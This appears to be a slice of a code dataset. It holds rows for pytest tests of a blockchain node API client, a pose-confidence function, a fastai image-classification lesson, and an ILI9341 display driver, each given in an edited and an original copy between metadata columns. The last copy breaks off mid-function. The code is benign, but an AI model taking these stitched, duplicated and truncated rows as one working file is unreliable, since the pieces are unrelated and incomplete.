@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_verbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=True)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_nonverbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'get', return_value=hexified_data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=False)
assert response == hexified_data
unserialized_response = ast.literal_eval(bytes.fromhex(hexified_data).decode('ascii'))
assert data == unserialized_response
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_decode_raw_transaction(mocker: MockerFixture, network, generate_uint256, generate_coinbase_transaction):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.decode_raw_transaction(raw_hex=hexified_data)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_validate_address(mocker: MockerFixture, network, generate_p2pkh_address):
address = generate_p2pkh_address(network=network)
data = {
'isvalid': True,
'address': address,
'scriptPubKey': 'a scriptPubKey',
'isscript': False,
'iswitness': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.validate_address(address=address)
assert response == ValidateAddressModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout(mocker: MockerFixture, network, generate_uint256, generate_hexstring, generate_p2pkh_address):
data = {
'bestblock': generate_uint256,
'confirmations': 1,
'value': 5,
'scriptPubKey': {
'asm': generate_hexstring(128),
'hex': generate_hexstring(128),
'type': 'pubkey',
'reqSigs': 1,
"addresses": [
generate_p2pkh_address(network=network)
]
},
'coinbase': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout(trxid=generate_uint256, vout=0, include_mempool=False)
assert response == GetTxOutModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout_proof(mocker: MockerFixture, network, generate_uint256, generate_hexstring):
data = generate_hexstring(128)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout_proof(
txids=[
generate_uint256,
generate_uint256
],
block_hash=generate_uint256
)
assert response == data
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_shutdown(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.shutdown()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_stop(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.stop()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_levels(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.log_levels(log_rules=[LogRule(rule_name='TestRule', log_level='Debug', filename='filename')])
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_rules(mocker: MockerFixture, network):
data = [
{
'ruleName': 'TestRule',
'logLevel': 'Debug',
'filename': 'filename'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.log_rules()
assert response == [LogRule(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_async_loops(mocker: MockerFixture, network):
data = [
{
'loopName': 'Loop1',
'status': 'Running'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.async_loops()
assert response == [AsyncLoopsModel(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_rewind(mocker: MockerFixture, network):
data = "Rewind flag set, please restart the node."
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.rewind(height=2)
assert isinstance(response, str)
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_delete_datafolder_chain(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'delete', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.delete_datafolder_chain()
# noinspection PyUnresolvedReferences
node.delete.assert_called_once()
| it | 0.331387 | 1.936756 | 2 |
imapper/pose/confidence.py | amonszpart/iMapper | 18 | 13567 | import numpy as np
def get_conf_thresholded(conf, thresh_log_conf, dtype_np):
"""Normalizes a confidence score to (0..1).
Args:
conf (float):
Unnormalized confidence.
dtype_np (type):
Desired return type.
Returns:
confidence (np.float32):
Normalized joint confidence.
"""
# 1. / (1. + np.exp(-5000. * conf + 5))
# https://www.desmos.com/calculator/olqbvoffua
# + 9.5: 0.0019 => 0.5
# + 5 : 0.0010 => 0.5
# + 6.5: 0.0013 => 0.5
return np.where(
conf < dtype_np(0.),
dtype_np(0.),
dtype_np(1.) /
(dtype_np(1.) + np.exp(dtype_np(-5000.) * conf + dtype_np(9.5)))
).astype(dtype_np)
def get_confs(query_2d_full, frame_id, thresh_log_conf, mx_conf, dtype_np):
"""
Args:
query_2d_full (stealth.logic.skeleton.Skeleton):
Skeleton with confidences.
frame_id (int):
Frame id.
Returns:
confs (List[float]):
Confidences at frame_id.
"""
confs = np.zeros(query_2d_full.poses.shape[-1],
dtype=dtype_np)
is_normalized = query_2d_full.is_confidence_normalized()
if query_2d_full.has_confidence(frame_id):
for joint, conf in query_2d_full.confidence[frame_id].items():
cnf = dtype_np(conf) \
if is_normalized \
else get_conf_thresholded(conf, thresh_log_conf, dtype_np)
if mx_conf is not None and mx_conf < cnf:
mx_conf = dtype_np(cnf)
confs[joint] = dtype_np(cnf)
if mx_conf is None:
return confs
else:
assert isinstance(mx_conf, dtype_np)
return confs, mx_conf
| import numpy as np
def get_conf_thresholded(conf, thresh_log_conf, dtype_np):
"""Normalizes a confidence score to (0..1).
Args:
conf (float):
Unnormalized confidence.
dtype_np (type):
Desired return type.
Returns:
confidence (np.float32):
Normalized joint confidence.
"""
# 1. / (1. + np.exp(-5000. * conf + 5))
# https://www.desmos.com/calculator/olqbvoffua
# + 9.5: 0.0019 => 0.5
# + 5 : 0.0010 => 0.5
# + 6.5: 0.0013 => 0.5
return np.where(
conf < dtype_np(0.),
dtype_np(0.),
dtype_np(1.) /
(dtype_np(1.) + np.exp(dtype_np(-5000.) * conf + dtype_np(9.5)))
).astype(dtype_np)
def get_confs(query_2d_full, frame_id, thresh_log_conf, mx_conf, dtype_np):
"""
Args:
query_2d_full (stealth.logic.skeleton.Skeleton):
Skeleton with confidences.
frame_id (int):
Frame id.
Returns:
confs (List[float]):
Confidences at frame_id.
"""
confs = np.zeros(query_2d_full.poses.shape[-1],
dtype=dtype_np)
is_normalized = query_2d_full.is_confidence_normalized()
if query_2d_full.has_confidence(frame_id):
for joint, conf in query_2d_full.confidence[frame_id].items():
cnf = dtype_np(conf) \
if is_normalized \
else get_conf_thresholded(conf, thresh_log_conf, dtype_np)
if mx_conf is not None and mx_conf < cnf:
mx_conf = dtype_np(cnf)
confs[joint] = dtype_np(cnf)
if mx_conf is None:
return confs
else:
assert isinstance(mx_conf, dtype_np)
return confs, mx_conf
| fr | 0.111582 | 2.65575 | 3 |
notes/lessons/lesson_1/dog_breed.py | jpenna/course-v3 | 0 | 13568 | from fastai.vision import *
from fastai.metrics import error_rate
# First model using pet images
###########################
####### Get dataset #######
###########################
# Batch size
bs = 64
# help(untar_data)
# print(URLs.PETS)
# URLs.PETS = https://s3.amazonaws.com/fast-ai-imageclas/oxford-iiit-pet
# Downloads the images from a URL and untar it. Retruns a `path` object
path = untar_data(URLs.PETS)
path.ls() # List content in path
path_anno = path/'annotations'
path_img = path/'images'
fnames = get_image_files(path_img) # Get image files in path
# fnames[:5]
np.random.seed(2)
pattern = r'/([^/]+)_\d+.jpg$'
# ImageDataBunch: all the data you need to create a model
# How to get the labels? Check models.md#Labels for a few examples
data = ImageDataBunch.from_name_re(
path_img,
fnames,
pattern,
ds_tfms=get_transforms(), # Transform images: crop, resize, padding
size=224,
bs=bs
)
# Same name length, sizes, pixel values...
data.normalize(imagenet_stats)
data.show_batch(rows=3, figsize=(7,6))
# Check number of classes/labels
print(data.classes) # Print labels
len(data.classes) # Print count
print(data.c) # Print count
###########################
######## Training #########
###########################
# Create the training object
learn = cnn_learner(data, models.resnet34, metrics=error_rate)
# Training model
learn.model
# Trains
learn.fit_one_cycle(4)
# Save result
learn.save('stage-1')
###########################
######## Results ##########
###########################
interp = ClassificationInterpretation.from_learner(learn)
losses, idxs = interp.top_losses()
len(data.valid_ds) == len(losses) == len(idxs)
# Print top losses
interp.plot_top_losses(9, figsize=(15,11))
doc(interp.plot_top_losses)
# Print confusion matrix
interp.plot_confusion_matrix(figsize=(12,12), dpi=60)
# Show list of most confused categories
interp.most_confused(min_val=2)
###########################
######## 2nd Round ########
###########################
# Unfreeze to train more
learn.unfreeze()
learn.fit_one_cycle(1)
learn.load('stage-1')
# Prepare chart
learn.lr_find()
# Plot chart
learn.recorder.plot()
learn.unfreeze()
learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4))
###########################
###### Change model #######
###########################
# Bigger images + smaller batch size
data = ImageDataBunch.from_name_re(path_img, fnames, pattern, ds_tfms=get_transforms(),
size=299, bs=bs//2).normalize(imagenet_stats)
# Use resnet50
learn = cnn_learner(data, models.resnet50, metrics=error_rate)
# Plot
learn.lr_find()
learn.recorder.plot()
learn.fit_one_cycle(8)
learn.save('stage-1-50')
# Fine-tune
learn.unfreeze()
learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4))
# Use previous model if fine-tune did not help
learn.load('stage-1-50')
###########################
# Interpret results again #
###########################
interp = ClassificationInterpretation.from_learner(learn)
interp.most_confused(min_val=2)
| from fastai.vision import *
from fastai.metrics import error_rate
# First model using pet images
###########################
####### Get dataset #######
###########################
# Batch size
bs = 64
# help(untar_data)
# print(URLs.PETS)
# URLs.PETS = https://s3.amazonaws.com/fast-ai-imageclas/oxford-iiit-pet
# Downloads the images from a URL and untar it. Retruns a `path` object
path = untar_data(URLs.PETS)
path.ls() # List content in path
path_anno = path/'annotations'
path_img = path/'images'
fnames = get_image_files(path_img) # Get image files in path
# fnames[:5]
np.random.seed(2)
pattern = r'/([^/]+)_\d+.jpg$'
# ImageDataBunch: all the data you need to create a model
# How to get the labels? Check models.md#Labels for a few examples
data = ImageDataBunch.from_name_re(
path_img,
fnames,
pattern,
ds_tfms=get_transforms(), # Transform images: crop, resize, padding
size=224,
bs=bs
)
# Same name length, sizes, pixel values...
data.normalize(imagenet_stats)
data.show_batch(rows=3, figsize=(7,6))
# Check number of classes/labels
print(data.classes) # Print labels
len(data.classes) # Print count
print(data.c) # Print count
###########################
######## Training #########
###########################
# Create the training object
learn = cnn_learner(data, models.resnet34, metrics=error_rate)
# Training model
learn.model
# Trains
learn.fit_one_cycle(4)
# Save result
learn.save('stage-1')
###########################
######## Results ##########
###########################
interp = ClassificationInterpretation.from_learner(learn)
losses, idxs = interp.top_losses()
len(data.valid_ds) == len(losses) == len(idxs)
# Print top losses
interp.plot_top_losses(9, figsize=(15,11))
doc(interp.plot_top_losses)
# Print confusion matrix
interp.plot_confusion_matrix(figsize=(12,12), dpi=60)
# Show list of most confused categories
interp.most_confused(min_val=2)
###########################
######## 2nd Round ########
###########################
# Unfreeze to train more
learn.unfreeze()
learn.fit_one_cycle(1)
learn.load('stage-1')
# Prepare chart
learn.lr_find()
# Plot chart
learn.recorder.plot()
learn.unfreeze()
learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4))
###########################
###### Change model #######
###########################
# Bigger images + smaller batch size
data = ImageDataBunch.from_name_re(path_img, fnames, pattern, ds_tfms=get_transforms(),
size=299, bs=bs//2).normalize(imagenet_stats)
# Use resnet50
learn = cnn_learner(data, models.resnet50, metrics=error_rate)
# Plot
learn.lr_find()
learn.recorder.plot()
learn.fit_one_cycle(8)
learn.save('stage-1-50')
# Fine-tune
learn.unfreeze()
learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4))
# Use previous model if fine-tune did not help
learn.load('stage-1-50')
###########################
# Interpret results again #
###########################
interp = ClassificationInterpretation.from_learner(learn)
interp.most_confused(min_val=2)
| it | 0.285799 | 2.491752 | 2 |
Day 1/Demos/ili934xnew.py | thingslu/IoT-Bootcamp | 0 | 13569 | """
Copyright (c) 2017 <NAME>
https://github.com/jeffmer/micropython-ili9341
Jan 6, 2018
MIT License
https://github.com/jeffmer/micropython-ili9341/blob/master/LICENSE
"""
# This is an adapted version of the ILI934X driver as below.
# It works with multiple fonts and also works with the esp32 H/W SPI implementation
# Also includes a word wrap print function
# Proportional fonts are generated by Peter Hinch's Font-to-py
# MIT License; Copyright (c) 2017 <NAME>
# This file is part of MicroPython ILI934X driver
# Copyright (c) 2016 - 2017 <NAME>, <NAME>
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# Project home:
# https://github.com/tuupola/micropython-ili934x
import time
import ustruct
import tt32
import framebuf
from micropython import const
_RDDSDR = const(0x0f) # Read Display Self-Diagnostic Result
_SLPOUT = const(0x11) # Sleep Out
_GAMSET = const(0x26) # Gamma Set
_DISPOFF = const(0x28) # Display Off
_DISPON = const(0x29) # Display On
_CASET = const(0x2a) # Column Address Set
_PASET = const(0x2b) # Page Address Set
_RAMWR = const(0x2c) # Memory Write
_RAMRD = const(0x2e) # Memory Read
_MADCTL = const(0x36) # Memory Access Control
_VSCRSADD = const(0x37) # Vertical Scrolling Start Address
_PIXSET = const(0x3a) # Pixel Format Set
_PWCTRLA = const(0xcb) # Power Control A
_PWCRTLB = const(0xcf) # Power Control B
_DTCTRLA = const(0xe8) # Driver Timing Control A
_DTCTRLB = const(0xea) # Driver Timing Control B
_PWRONCTRL = const(0xed) # Power on Sequence Control
_PRCTRL = const(0xf7) # Pump Ratio Control
_PWCTRL1 = const(0xc0) # Power Control 1
_PWCTRL2 = const(0xc1) # Power Control 2
_VMCTRL1 = const(0xc5) # VCOM Control 1
_VMCTRL2 = const(0xc7) # VCOM Control 2
_FRMCTR1 = const(0xb1) # Frame Rate Control 1
_DISCTRL = const(0xb6) # Display Function Control
_ENA3G = const(0xf2) # Enable 3G
_PGAMCTRL = const(0xe0) # Positive Gamma Control
_NGAMCTRL = const(0xe1) # Negative Gamma Control
_CHUNK = const(1024) #maximum number of pixels per spi write
def color565(r, g, b):
    """Pack 8-bit R, G, B components into a single 16-bit RGB565 value."""
    red = (r & 0xf8) << 8
    green = (g & 0xfc) << 3
    blue = b >> 3
    return red | green | blue
class ILI9341:
    """Driver for an ILI9341 320x240 TFT panel over SPI (MicroPython).

    Provides pixel/rectangle drawing, 1-bit framebuffer blitting, text
    rendering with proportional fonts, and hardware vertical scrolling.
    """

    width = 320
    height = 240

    def __init__(self, spi, cs, dc, rst):
        # spi: configured SPI bus; cs/dc/rst: chip-select, data/command
        # and reset control pins (machine.Pin-like objects).
        self.spi = spi
        self.cs = cs
        self.dc = dc
        self.rst = rst
        self.cs.init(self.cs.OUT, value=1)
        self.dc.init(self.dc.OUT, value=0)
        self.rst.init(self.rst.OUT, value=0)
        self.reset()
        self.init()
        self._scroll = 0                    # current hardware scroll offset in pixels
        self._buf = bytearray(_CHUNK * 2)   # staging buffer: 2 bytes per RGB565 pixel
        self._colormap = bytearray(b'\x00\x00\xFF\xFF') #default white foregraound, black background
        self._x = 0                         # text cursor position
        self._y = 0
        self._font = tt32
        self.scrolling = False

    def set_color(self, fg, bg):
        """Set foreground/background colours (RGB565, stored big-endian)."""
        self._colormap[0] = bg >> 8
        self._colormap[1] = bg & 255
        self._colormap[2] = fg >> 8
        self._colormap[3] = fg & 255

    def set_pos(self, x, y):
        """Move the text cursor to (x, y)."""
        self._x = x
        self._y = y

    def reset_scroll(self):
        """Leave scrolling mode and reset the hardware scroll offset."""
        self.scrolling = False
        self._scroll = 0
        self.scroll(0)

    def set_font(self, font):
        """Select the font module used by chars()/write()/print()."""
        self._font = font

    def init(self):
        """Send the ILI9341 power-on initialisation command sequence."""
        for command, data in (
                (_RDDSDR, b"\x03\x80\x02"),
                (_PWCRTLB, b"\x00\xc1\x30"),
                (_PWRONCTRL, b"\x64\x03\x12\x81"),
                (_DTCTRLA, b"\x85\x00\x78"),
                (_PWCTRLA, b"\x39\x2c\x00\x34\x02"),
                (_PRCTRL, b"\x20"),
                (_DTCTRLB, b"\x00\x00"),
                (_PWCTRL1, b"\x23"),
                (_PWCTRL2, b"\x10"),
                (_VMCTRL1, b"\x3e\x28"),
                (_VMCTRL2, b"\x86"),
                #(_MADCTL, b"\x48"),
                (_MADCTL, b"\x08"),
                (_PIXSET, b"\x55"),
                (_FRMCTR1, b"\x00\x18"),
                (_DISCTRL, b"\x08\x82\x27"),
                (_ENA3G, b"\x00"),
                (_GAMSET, b"\x01"),
                (_PGAMCTRL, b"\x0f\x31\x2b\x0c\x0e\x08\x4e\xf1\x37\x07\x10\x03\x0e\x09\x00"),
                (_NGAMCTRL, b"\x00\x0e\x14\x03\x11\x07\x31\xc1\x48\x08\x0f\x0c\x31\x36\x0f")):
            self._write(command, data)
        self._write(_SLPOUT)
        time.sleep_ms(120)
        self._write(_DISPON)

    def reset(self):
        """Pulse the hardware reset line."""
        self.rst(0)
        time.sleep_ms(50)
        self.rst(1)
        time.sleep_ms(50)

    def _write(self, command, data=None):
        # Command phase: DC low while the opcode byte is clocked out.
        self.dc(0)
        self.cs(0)
        self.spi.write(bytearray([command]))
        self.cs(1)
        if data is not None:
            self._data(data)

    def _data(self, data):
        # Data phase: DC high while payload bytes are clocked out.
        self.dc(1)
        self.cs(0)
        self.spi.write(data)
        self.cs(1)

    def _writeblock(self, x0, y0, x1, y1, data=None):
        # Define the drawing window, then optionally stream pixel data into it.
        self._write(_CASET, ustruct.pack(">HH", x0, x1))
        self._write(_PASET, ustruct.pack(">HH", y0, y1))
        self._write(_RAMWR, data)

    def _readblock(self, x0, y0, x1, y1, data=None):
        # BUG FIX: 'data' was referenced but never defined (NameError on every
        # call). Restored as an optional parameter, mirroring _writeblock.
        self._write(_CASET, ustruct.pack(">HH", x0, x1))
        self._write(_PASET, ustruct.pack(">HH", y0, y1))
        if data is None:
            # 3 bytes (R, G, B) are returned per pixel in the window.
            return self._read(_RAMRD, (x1 - x0 + 1) * (y1 - y0 + 1) * 3)

    def _read(self, command, count):
        # Issue a read command and clock in `count` response bytes.
        self.dc(0)
        self.cs(0)
        self.spi.write(bytearray([command]))
        data = self.spi.read(count)
        self.cs(1)
        return data

    def pixel(self, x, y, color=None):
        """Read one pixel (color is None) or write it; out-of-range writes are ignored."""
        if color is None:
            # NOTE(review): unpack order r, b, g matches the original driver;
            # confirm against the panel's RGB/BGR memory access setting.
            r, b, g = self._readblock(x, y, x, y)
            return color565(r, g, b)
        if not 0 <= x < self.width or not 0 <= y < self.height:
            return
        self._writeblock(x, y, x, y, ustruct.pack(">H", color))

    def fill_rectangle(self, x, y, w, h, color=None):
        """Fill a clipped rectangle with RGB565 `color` (background colour if None)."""
        x = min(self.width - 1, max(0, x))
        y = min(self.height - 1, max(0, y))
        w = min(self.width - x, max(1, w))
        h = min(self.height - y, max(1, h))
        # BUG FIX: was `if color:`, which treated black (0) as "no colour given"
        # and silently substituted the background colour.
        if color is not None:
            color = ustruct.pack(">H", color)
        else:
            color = self._colormap[0:2] #background
        for i in range(_CHUNK):
            self._buf[2*i] = color[0]; self._buf[2*i+1] = color[1]
        chunks, rest = divmod(w * h, _CHUNK)
        self._writeblock(x, y, x + w - 1, y + h - 1, None)
        if chunks:
            for count in range(chunks):
                self._data(self._buf)
        if rest != 0:
            mv = memoryview(self._buf)
            self._data(mv[:rest*2])

    def erase(self):
        """Clear the whole screen to the background colour."""
        self.fill_rectangle(0, 0, self.width, self.height)

    def blit(self, bitbuff, x, y, w, h):
        """Copy a 1-bit framebuffer to the panel, mapping 0/1 through the colormap."""
        x = min(self.width - 1, max(0, x))
        y = min(self.height - 1, max(0, y))
        w = min(self.width - x, max(1, w))
        h = min(self.height - y, max(1, h))
        chunks, rest = divmod(w * h, _CHUNK)
        self._writeblock(x, y, x + w - 1, y + h - 1, None)
        written = 0
        for iy in range(h):
            for ix in range(w):
                index = ix + iy*w - written
                if index >= _CHUNK:
                    # Staging buffer full: flush it and continue filling.
                    self._data(self._buf)
                    written += _CHUNK
                    index -= _CHUNK
                c = bitbuff.pixel(ix, iy)
                self._buf[index*2] = self._colormap[c*2]
                self._buf[index*2+1] = self._colormap[c*2+1]
        rest = w*h - written
        if rest != 0:
            mv = memoryview(self._buf)
            self._data(mv[:rest*2])

    def chars(self, str, x, y):
        """Render `str` at (x, y); return the x position just after the text."""
        str_w = self._font.get_width(str)
        div, rem = divmod(self._font.height(), 8)
        nbytes = div+1 if rem else div
        # Assemble all glyph columns into one MONO_VLSB buffer, then blit once.
        buf = bytearray(str_w * nbytes)
        pos = 0
        for ch in str:
            glyph, char_w = self._font.get_ch(ch)
            for row in range(nbytes):
                index = row*str_w + pos
                for i in range(char_w):
                    buf[index+i] = glyph[nbytes*i+row]
            pos += char_w
        fb = framebuf.FrameBuffer(buf, str_w, self._font.height(), framebuf.MONO_VLSB)
        self.blit(fb, x, y, str_w, self._font.height())
        return x + str_w

    def scroll(self, dy):
        """Advance the hardware vertical scroll origin by dy pixels."""
        self._scroll = (self._scroll + dy) % self.height
        self._write(_VSCRSADD, ustruct.pack(">H", self._scroll))

    def next_line(self, cury, char_h):
        # BUG FIX: removed a stray `global scrolling` declaration -- the state
        # lives in self.scrolling and no module-level `scrolling` exists.
        if not self.scrolling:
            res = cury + char_h
            self.scrolling = (res >= self.height)
        if self.scrolling:
            # Scroll one text line and blank the line that wrapped into view.
            self.scroll(char_h)
            res = (self.height - char_h + self._scroll) % self.height
            self.fill_rectangle(0, res, self.width, self._font.height())
        return res

    def write(self, text): #does character wrap, compatible with stream output
        """Write text with per-character wrapping; updates the text cursor."""
        curx = self._x; cury = self._y
        char_h = self._font.height()
        width = 0
        written = 0
        for pos, ch in enumerate(text):
            if ch == '\n':
                if pos > 0:
                    self.chars(text[written:pos], curx, cury)
                curx = 0; written = pos+1; width = 0
                cury = self.next_line(cury, char_h)
            else:
                char_w = self._font.get_width(ch)
                if curx + width + char_w >= self.width:
                    self.chars(text[written:pos], curx, cury)
                    # NOTE(review): resetting width to char_h (not char_w)
                    # matches the original but looks suspicious -- confirm.
                    curx = 0; written = pos; width = char_h
                    cury = self.next_line(cury, char_h)
                else:
                    width += char_w
        if written < len(text):
            curx = self.chars(text[written:], curx, cury)
        self._x = curx; self._y = cury

    def print(self, text): #does word wrap, leaves self._x unchanged
        """Print text with word wrapping; advances self._y, restores self._x."""
        cury = self._y; curx = self._x
        char_h = self._font.height()
        char_w = self._font.max_width()
        lines = text.split('\n')
        for line in lines:
            words = line.split(' ')
            for word in words:
                if curx + self._font.get_width(word) >= self.width:
                    curx = self._x; cury = self.next_line(cury, char_h)
                # Words wider than the screen are hard-split across lines.
                while self._font.get_width(word) > self.width:
                    self.chars(word[:self.width//char_w], curx, cury)
                    word = word[self.width//char_w:]
                    cury = self.next_line(cury, char_h)
                if len(word) > 0:
                    curx = self.chars(word+' ', curx, cury)
            curx = self._x; cury = self.next_line(cury, char_h)
        self._y = cury
Copyright (c) 2017 <NAME>
https://github.com/jeffmer/micropython-ili9341
Jan 6, 2018
MIT License
https://github.com/jeffmer/micropython-ili9341/blob/master/LICENSE
"""
# This is an adapted version of the ILI934X driver as below.
# It works with multiple fonts and also works with the esp32 H/W SPI implementation
# Also includes a word wrap print function
# Proportional fonts are generated by Peter Hinch's Font-to-py
# MIT License; Copyright (c) 2017 <NAME>
# This file is part of MicroPython ILI934X driver
# Copyright (c) 2016 - 2017 <NAME>, <NAME>
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# Project home:
# https://github.com/tuupola/micropython-ili934x
import time
import ustruct
import tt32
import framebuf
from micropython import const
_RDDSDR = const(0x0f) # Read Display Self-Diagnostic Result
_SLPOUT = const(0x11) # Sleep Out
_GAMSET = const(0x26) # Gamma Set
_DISPOFF = const(0x28) # Display Off
_DISPON = const(0x29) # Display On
_CASET = const(0x2a) # Column Address Set
_PASET = const(0x2b) # Page Address Set
_RAMWR = const(0x2c) # Memory Write
_RAMRD = const(0x2e) # Memory Read
_MADCTL = const(0x36) # Memory Access Control
_VSCRSADD = const(0x37) # Vertical Scrolling Start Address
_PIXSET = const(0x3a) # Pixel Format Set
_PWCTRLA = const(0xcb) # Power Control A
_PWCRTLB = const(0xcf) # Power Control B
_DTCTRLA = const(0xe8) # Driver Timing Control A
_DTCTRLB = const(0xea) # Driver Timing Control B
_PWRONCTRL = const(0xed) # Power on Sequence Control
_PRCTRL = const(0xf7) # Pump Ratio Control
_PWCTRL1 = const(0xc0) # Power Control 1
_PWCTRL2 = const(0xc1) # Power Control 2
_VMCTRL1 = const(0xc5) # VCOM Control 1
_VMCTRL2 = const(0xc7) # VCOM Control 2
_FRMCTR1 = const(0xb1) # Frame Rate Control 1
_DISCTRL = const(0xb6) # Display Function Control
_ENA3G = const(0xf2) # Enable 3G
_PGAMCTRL = const(0xe0) # Positive Gamma Control
_NGAMCTRL = const(0xe1) # Negative Gamma Control
_CHUNK = const(1024) #maximum number of pixels per spi write
def color565(r, g, b):
return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3
class ILI9341:
width = 320
height = 240
def __init__(self, spi, cs, dc, rst):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.reset()
self.init()
self._scroll = 0
self._buf = bytearray(_CHUNK * 2)
self._colormap = bytearray(b'\x00\x00\xFF\xFF') #default white foregraound, black background
self._x = 0
self._y = 0
self._font = tt32
self.scrolling = False
def set_color(self,fg,bg):
self._colormap[0] = bg>>8
self._colormap[1] = bg & 255
self._colormap[2] = fg>>8
self._colormap[3] = fg & 255
def set_pos(self,x,y):
self._x = x
self._y = y
def reset_scroll(self):
self.scrolling = False
self._scroll = 0
self.scroll(0)
def set_font(self, font):
self._font = font
def init(self):
for command, data in (
(_RDDSDR, b"\x03\x80\x02"),
(_PWCRTLB, b"\x00\xc1\x30"),
(_PWRONCTRL, b"\x64\x03\x12\x81"),
(_DTCTRLA, b"\x85\x00\x78"),
(_PWCTRLA, b"\x39\x2c\x00\x34\x02"),
(_PRCTRL, b"\x20"),
(_DTCTRLB, b"\x00\x00"),
(_PWCTRL1, b"\x23"),
(_PWCTRL2, b"\x10"),
(_VMCTRL1, b"\x3e\x28"),
(_VMCTRL2, b"\x86"),
#(_MADCTL, b"\x48"),
(_MADCTL, b"\x08"),
(_PIXSET, b"\x55"),
(_FRMCTR1, b"\x00\x18"),
(_DISCTRL, b"\x08\x82\x27"),
(_ENA3G, b"\x00"),
(_GAMSET, b"\x01"),
(_PGAMCTRL, b"\x0f\x31\x2b\x0c\x0e\x08\x4e\xf1\x37\x07\x10\x03\x0e\x09\x00"),
(_NGAMCTRL, b"\x00\x0e\x14\x03\x11\x07\x31\xc1\x48\x08\x0f\x0c\x31\x36\x0f")):
self._write(command, data)
self._write(_SLPOUT)
time.sleep_ms(120)
self._write(_DISPON)
def reset(self):
self.rst(0)
time.sleep_ms(50)
self.rst(1)
time.sleep_ms(50)
def _write(self, command, data=None):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
self.cs(1)
if data is not None:
self._data(data)
def _data(self, data):
self.dc(1)
self.cs(0)
self.spi.write(data)
self.cs(1)
def _writeblock(self, x0, y0, x1, y1, data=None):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
self._write(_PASET, ustruct.pack(">HH", y0, y1))
self._write(_RAMWR, data)
def _readblock(self, x0, y0, x1, y1):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
